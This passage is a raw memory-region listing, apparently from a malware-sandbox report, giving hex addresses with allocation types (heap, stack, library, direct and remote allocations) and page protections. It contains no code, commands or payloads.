trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
7427000
|
heap
|
page read and write
|
||
|
1ACAFCD0000
|
heap
|
page read and write
|
||
|
2537BBCE000
|
trusted library allocation
|
page read and write
|
||
|
64FB000
|
heap
|
page read and write
|
||
|
214ABDDD000
|
heap
|
page read and write
|
||
|
333A000
|
heap
|
page read and write
|
||
|
225A0000
|
heap
|
page read and write
|
||
|
EBA000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
F5D000
|
stack
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
2149526D000
|
trusted library allocation
|
page read and write
|
||
|
DBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7799000
|
heap
|
page read and write
|
||
|
9FC000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
214934B0000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
trusted library section
|
page read and write
|
||
|
21150000
|
direct allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
547F000
|
stack
|
page read and write
|
||
|
21BD1000
|
heap
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
28C8000
|
heap
|
page read and write
|
||
|
1040000
|
unkown
|
page readonly
|
||
|
703E000
|
stack
|
page read and write
|
||
|
9DC000
|
stack
|
page read and write
|
||
|
214ABC43000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
3015000
|
heap
|
page read and write
|
||
|
4BC5000
|
heap
|
page read and write
|
||
|
E8F000
|
stack
|
page read and write
|
||
|
7640000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
895000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
21491C53000
|
heap
|
page read and write
|
||
|
8634000
|
heap
|
page read and write
|
||
|
21FBC000
|
stack
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
76F2000
|
heap
|
page read and write
|
||
|
B82B000
|
direct allocation
|
page execute and read and write
|
||
|
219CD000
|
stack
|
page read and write
|
||
|
21493B5D000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
BBE000
|
stack
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
1320000
|
unkown
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
70DA000
|
stack
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
7C9F000
|
stack
|
page read and write
|
||
|
101C000
|
system
|
page execute and read and write
|
||
|
2537B6F0000
|
trusted library allocation
|
page read and write
|
||
|
1A47E66B000
|
heap
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
1A47EC60000
|
heap
|
page read and write
|
||
|
50EF2FD000
|
stack
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A47E672000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
6D5E000
|
stack
|
page read and write
|
||
|
51F6000
|
trusted library allocation
|
page read and write
|
||
|
211A0000
|
direct allocation
|
page read and write
|
||
|
76EF000
|
heap
|
page read and write
|
||
|
6188000
|
heap
|
page read and write
|
||
|
2A82B7E000
|
stack
|
page read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
D0C000
|
heap
|
page read and write
|
||
|
7050000
|
direct allocation
|
page read and write
|
||
|
BDE000
|
stack
|
page read and write
|
||
|
21493F63000
|
trusted library allocation
|
page read and write
|
||
|
923000
|
heap
|
page read and write
|
||
|
31E0000
|
trusted library section
|
page read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
7826000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
333F000
|
heap
|
page read and write
|
||
|
1A21000
|
unkown
|
page readonly
|
||
|
84C0000
|
heap
|
page read and write
|
||
|
4629000
|
direct allocation
|
page execute and read and write
|
||
|
59A1000
|
heap
|
page read and write
|
||
|
34C6000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page execute and read and write
|
||
|
4BCB000
|
heap
|
page read and write
|
||
|
444E000
|
stack
|
page read and write
|
||
|
21D20000
|
direct allocation
|
page read and write
|
||
|
739D000
|
stack
|
page read and write
|
||
|
4BC5000
|
heap
|
page read and write
|
||
|
4BC7000
|
heap
|
page read and write
|
||
|
6505000
|
heap
|
page read and write
|
||
|
1A47EC50000
|
heap
|
page read and write
|
||
|
7440000
|
heap
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
223D9000
|
unclassified section
|
page execute and read and write
|
||
|
214ABD71000
|
heap
|
page read and write
|
||
|
223F3000
|
unclassified section
|
page execute and read and write
|
||
|
38C4000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
3573000
|
heap
|
page read and write
|
||
|
21494F73000
|
trusted library allocation
|
page read and write
|
||
|
74EE000
|
stack
|
page read and write
|
||
|
1A47EC46000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
1A47F39B000
|
heap
|
page read and write
|
||
|
4E9F000
|
stack
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page read and write
|
||
|
25379CF0000
|
system
|
page execute and read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
4BCC000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
5FF4000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
3569000
|
heap
|
page read and write
|
||
|
1A47E682000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
83A0000
|
heap
|
page read and write
|
||
|
85DC000
|
stack
|
page read and write
|
||
|
21950000
|
direct allocation
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
287F000
|
stack
|
page read and write
|
||
|
CE6000
|
heap
|
page read and write
|
||
|
21EC0000
|
remote allocation
|
page read and write
|
||
|
21F5F000
|
stack
|
page read and write
|
||
|
A4376FF000
|
stack
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
unkown
|
page readonly
|
||
|
C1000
|
unkown
|
page execute read
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
4B2C000
|
unclassified section
|
page read and write
|
||
|
4B2D000
|
stack
|
page read and write
|
||
|
219FF000
|
stack
|
page read and write
|
||
|
6700000
|
direct allocation
|
page read and write
|
||
|
7DB5000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
1A47E5D3000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
1A47F3AB000
|
heap
|
page read and write
|
||
|
89E0000
|
direct allocation
|
page read and write
|
||
|
84BC000
|
stack
|
page read and write
|
||
|
7DC0000
|
heap
|
page read and write
|
||
|
217DE000
|
stack
|
page read and write
|
||
|
7D1F000
|
stack
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
3549000
|
heap
|
page read and write
|
||
|
58AD000
|
heap
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
59AD000
|
heap
|
page read and write
|
||
|
1A47E4E0000
|
heap
|
page read and write
|
||
|
8715000
|
heap
|
page read and write
|
||
|
444D000
|
stack
|
page read and write
|
||
|
66E0000
|
direct allocation
|
page read and write
|
||
|
382E000
|
stack
|
page read and write
|
||
|
21493520000
|
trusted library allocation
|
page read and write
|
||
|
73AB000
|
heap
|
page read and write
|
||
|
63A0000
|
direct allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
4BB5000
|
heap
|
page read and write
|
||
|
356A000
|
heap
|
page read and write
|
||
|
F8F000
|
stack
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
6491000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
214ABBCD000
|
heap
|
page read and write
|
||
|
4BB9000
|
heap
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
53BB000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
unkown
|
page readonly
|
||
|
21A4E000
|
stack
|
page read and write
|
||
|
21495391000
|
trusted library allocation
|
page read and write
|
||
|
4BDB000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
3204000
|
trusted library allocation
|
page read and write
|
||
|
2ADC000
|
heap
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
6EEB000
|
stack
|
page read and write
|
||
|
2149585F000
|
trusted library allocation
|
page read and write
|
||
|
49A6000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
1370000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
251B000
|
stack
|
page read and write
|
||
|
2C6D000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
646C000
|
heap
|
page read and write
|
||
|
4FEE000
|
heap
|
page read and write
|
||
|
9D45AFC000
|
stack
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
7030000
|
direct allocation
|
page read and write
|
||
|
50C0000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
D78000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
6F9D000
|
stack
|
page read and write
|
||
|
2537BA21000
|
trusted library allocation
|
page read and write
|
||
|
3561000
|
heap
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
4C32000
|
heap
|
page read and write
|
||
|
F9F000
|
system
|
page execute and read and write
|
||
|
356E000
|
heap
|
page read and write
|
||
|
4C32000
|
heap
|
page read and write
|
||
|
7010000
|
direct allocation
|
page read and write
|
||
|
2A83A4D000
|
stack
|
page read and write
|
||
|
1ACAF960000
|
heap
|
page read and write
|
||
|
215EE000
|
stack
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
4AEF000
|
stack
|
page read and write
|
||
|
5FF4000
|
heap
|
page read and write
|
||
|
1A47F355000
|
heap
|
page read and write
|
||
|
6F00000
|
direct allocation
|
page read and write
|
||
|
59AA000
|
heap
|
page read and write
|
||
|
A42B000
|
direct allocation
|
page execute and read and write
|
||
|
3328000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
2247C000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
CF8000
|
heap
|
page read and write
|
||
|
D8F000
|
heap
|
page read and write
|
||
|
1A47EC58000
|
heap
|
page read and write
|
||
|
21140000
|
direct allocation
|
page read and write
|
||
|
6720000
|
direct allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
5DFA000
|
remote allocation
|
page execute and read and write
|
||
|
37D0000
|
heap
|
page read and write
|
||
|
63B0000
|
direct allocation
|
page read and write
|
||
|
1A47E675000
|
heap
|
page read and write
|
||
|
6504000
|
heap
|
page read and write
|
||
|
2A8258E000
|
stack
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
22785000
|
heap
|
page read and write
|
||
|
D3C000
|
heap
|
page read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
2A83B4B000
|
stack
|
page read and write
|
||
|
2A82F7B000
|
stack
|
page read and write
|
||
|
C1000
|
unkown
|
page execute read
|
||
|
888000
|
heap
|
page read and write
|
||
|
7771000
|
heap
|
page read and write
|
||
|
768E000
|
stack
|
page read and write
|
||
|
353E000
|
heap
|
page read and write
|
||
|
D3F000
|
heap
|
page read and write
|
||
|
61F2000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7DA7000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
EA0000
|
heap
|
page readonly
|
||
|
21EC0000
|
heap
|
page read and write
|
||
|
550E000
|
heap
|
page read and write
|
||
|
222B0000
|
unclassified section
|
page execute and read and write
|
||
|
3E60000
|
remote allocation
|
page execute and read and write
|
||
|
4FED000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
6F20000
|
direct allocation
|
page read and write
|
||
|
73BE000
|
heap
|
page read and write
|
||
|
4BC6000
|
heap
|
page read and write
|
||
|
39F5C000
|
system
|
page read and write
|
||
|
9D45B7F000
|
stack
|
page read and write
|
||
|
2A82AFE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
214ABC40000
|
heap
|
page read and write
|
||
|
F59000
|
trusted library allocation
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
2278D000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
5F8E000
|
stack
|
page read and write
|
||
|
5907000
|
heap
|
page read and write
|
||
|
66D000
|
stack
|
page read and write
|
||
|
3582000
|
heap
|
page read and write
|
||
|
59B4000
|
heap
|
page read and write
|
||
|
3A344000
|
system
|
page read and write
|
||
|
2BA0000
|
direct allocation
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
89A000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page execute and read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21FFC000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
AE2B000
|
direct allocation
|
page execute and read and write
|
||
|
1397000
|
heap
|
page read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
EE0000
|
unkown
|
page readonly
|
||
|
749A000
|
heap
|
page read and write
|
||
|
214935A0000
|
heap
|
page execute and read and write
|
||
|
77E0000
|
heap
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
2537BA0A000
|
trusted library allocation
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
25379ECA000
|
heap
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
FC5000
|
system
|
page execute and read and write
|
||
|
4C4C000
|
stack
|
page read and write
|
||
|
48E7000
|
unkown
|
page execute and read and write
|
||
|
4A02000
|
trusted library allocation
|
page read and write
|
||
|
292D000
|
heap
|
page read and write
|
||
|
22400000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
2203E000
|
stack
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
7CDE000
|
stack
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
4B6F000
|
stack
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
82E0000
|
trusted library allocation
|
page read and write
|
||
|
351D000
|
heap
|
page read and write
|
||
|
47AB000
|
stack
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
DB4000
|
trusted library allocation
|
page read and write
|
||
|
2283C000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4F91000
|
trusted library allocation
|
page read and write
|
||
|
59E5000
|
heap
|
page read and write
|
||
|
6FAD000
|
stack
|
page read and write
|
||
|
CF3000
|
heap
|
page read and write
|
||
|
2149527B000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A47F3AA000
|
heap
|
page read and write
|
||
|
214A3928000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
30E0000
|
unkown
|
page execute and read and write
|
||
|
58AD000
|
heap
|
page read and write
|
||
|
21493630000
|
heap
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
4912000
|
unclassified section
|
page read and write
|
||
|
82B5000
|
trusted library allocation
|
page read and write
|
||
|
34DB000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
22380000
|
unclassified section
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2FF0000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
D98000
|
heap
|
page read and write
|
||
|
21BD1000
|
heap
|
page read and write
|
||
|
61A7000
|
heap
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
2B38000
|
heap
|
page read and write
|
||
|
25379ECF000
|
heap
|
page read and write
|
||
|
8711000
|
heap
|
page read and write
|
||
|
FA1000
|
system
|
page execute and read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
4BD7000
|
heap
|
page read and write
|
||
|
7570000
|
heap
|
page read and write
|
||
|
CCC000
|
heap
|
page read and write
|
||
|
4BBD000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
73DB000
|
stack
|
page read and write
|
||
|
77EE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
F43000
|
trusted library allocation
|
page execute and read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
CDE000
|
heap
|
page read and write
|
||
|
1A47EC54000
|
heap
|
page read and write
|
||
|
8A00000
|
direct allocation
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
53F1000
|
heap
|
page read and write
|
||
|
58A0000
|
heap
|
page read and write
|
||
|
6D1E000
|
stack
|
page read and write
|
||
|
46CE000
|
stack
|
page read and write
|
||
|
4FA7000
|
trusted library allocation
|
page read and write
|
||
|
2D6D000
|
stack
|
page read and write
|
||
|
60FF000
|
stack
|
page read and write
|
||
|
2C58000
|
heap
|
page read and write
|
||
|
1A47E8AE000
|
heap
|
page read and write
|
||
|
8719000
|
heap
|
page read and write
|
||
|
4910000
|
trusted library allocation
|
page read and write
|
||
|
2283C000
|
heap
|
page read and write
|
||
|
355F000
|
heap
|
page read and write
|
||
|
A436FFE000
|
stack
|
page read and write
|
||
|
617F000
|
stack
|
page read and write
|
||
|
899000
|
heap
|
page read and write
|
||
|
4BE4000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
FB5000
|
heap
|
page execute and read and write
|
||
|
DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
53CA000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
6E6E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
22849000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
343F000
|
stack
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
214955FB000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
4AF7000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
heap
|
page readonly
|
||
|
6213000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
222F6000
|
direct allocation
|
page execute and read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
2830000
|
heap
|
page read and write
|
||
|
C1000
|
unkown
|
page execute read
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
D5000
|
unkown
|
page read and write
|
||
|
3557000
|
heap
|
page read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
84EE000
|
stack
|
page read and write
|
||
|
44CF000
|
stack
|
page read and write
|
||
|
88A0000
|
direct allocation
|
page read and write
|
||
|
F88000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
52EC000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
unkown
|
page read and write
|
||
|
320D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A47E8AB000
|
heap
|
page read and write
|
||
|
2A5F000
|
stack
|
page read and write
|
||
|
6130000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
5391000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
7DAD000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
496E000
|
stack
|
page read and write
|
||
|
21491C12000
|
heap
|
page read and write
|
||
|
214ABB78000
|
heap
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
2A6E000
|
stack
|
page read and write
|
||
|
5EBE000
|
stack
|
page read and write
|
||
|
25379DD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
5FD0000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
73B2000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page readonly
|
||
|
1A47E5F2000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
214ABB17000
|
heap
|
page execute and read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
73E5000
|
heap
|
page read and write
|
||
|
437E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8559000
|
heap
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
643F000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
32FE000
|
stack
|
page read and write
|
||
|
66F0000
|
direct allocation
|
page read and write
|
||
|
778F000
|
heap
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
7713000
|
heap
|
page read and write
|
||
|
25379EF2000
|
heap
|
page read and write
|
||
|
59B4000
|
heap
|
page read and write
|
||
|
DDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
448E000
|
stack
|
page read and write
|
||
|
82D9000
|
trusted library allocation
|
page read and write
|
||
|
4855000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
25A0000
|
heap
|
page read and write
|
||
|
F70000
|
trusted library allocation
|
page read and write
|
||
|
1311000
|
unkown
|
page readonly
|
||
|
51C0000
|
trusted library allocation
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
A4377FB000
|
stack
|
page read and write
|
||
|
76F9000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
5B61000
|
trusted library allocation
|
page read and write
|
||
|
66A0000
|
direct allocation
|
page read and write
|
||
|
440E000
|
stack
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
738E000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
5505000
|
heap
|
page read and write
|
||
|
D10000
|
unkown
|
page read and write
|
||
|
7769000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
2270C000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
88FE000
|
stack
|
page read and write
|
||
|
D94000
|
heap
|
page read and write
|
||
|
4BC8000
|
heap
|
page read and write
|
||
|
214934E0000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
2E9B000
|
stack
|
page read and write
|
||
|
7231000
|
heap
|
page read and write
|
||
|
21491B45000
|
heap
|
page read and write
|
||
|
3582000
|
heap
|
page read and write
|
||
|
4C9C000
|
trusted library allocation
|
page read and write
|
||
|
21200000
|
direct allocation
|
page read and write
|
||
|
D80000
|
trusted library allocation
|
page read and write
|
||
|
64A5000
|
heap
|
page read and write
|
||
|
82E7000
|
stack
|
page read and write
|
||
|
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2165C000
|
stack
|
page read and write
|
||
|
22849000
|
heap
|
page read and write
|
||
|
5C1D000
|
stack
|
page read and write
|
||
|
1A47E667000
|
heap
|
page read and write
|
||
|
1A47F36F000
|
heap
|
page read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
357F000
|
heap
|
page read and write
|
||
|
21B8E000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
86AC000
|
stack
|
page read and write
|
||
|
8137000
|
trusted library allocation
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
73A3000
|
heap
|
page read and write
|
||
|
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
|
21491C25000
|
heap
|
page read and write
|
||
|
49A1000
|
trusted library allocation
|
page read and write
|
||
|
613C000
|
stack
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
4B90000
|
heap
|
page read and write
|
||
|
75E7000
|
trusted library allocation
|
page read and write
|
||
|
6418000
|
heap
|
page read and write
|
||
|
47CD000
|
direct allocation
|
page execute and read and write
|
||
|
21220000
|
direct allocation
|
page read and write
|
||
|
AC5000
|
heap
|
page read and write
|
||
|
323B000
|
stack
|
page read and write
|
||
|
21AC0000
|
heap
|
page read and write
|
||
|
552F000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
21B0B000
|
stack
|
page read and write
|
||
|
73E000
|
unkown
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
214ABB10000
|
heap
|
page execute and read and write
|
||
|
1340000
|
unkown
|
page readonly
|
||
|
7000000
|
direct allocation
|
page read and write
|
||
|
53FA000
|
remote allocation
|
page execute and read and write
|
||
|
516F000
|
stack
|
page read and write
|
||
|
2287B000
|
heap
|
page read and write
|
||
|
7DCB000
|
heap
|
page read and write
|
||
|
59D8000
|
heap
|
page read and write
|
||
|
F1C000
|
stack
|
page read and write
|
||
|
893000
|
heap
|
page read and write
|
||
|
CA5000
|
heap
|
page read and write
|
||
|
F20000
|
trusted library section
|
page read and write
|
||
|
55AB000
|
trusted library allocation
|
page read and write
|
||
|
7739000
|
heap
|
page read and write
|
||
|
2A88000
|
heap
|
page read and write
|
||
|
6208000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
3546000
|
heap
|
page read and write
|
||
|
29A0000
|
unkown
|
page readonly
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
757E000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
34C6000
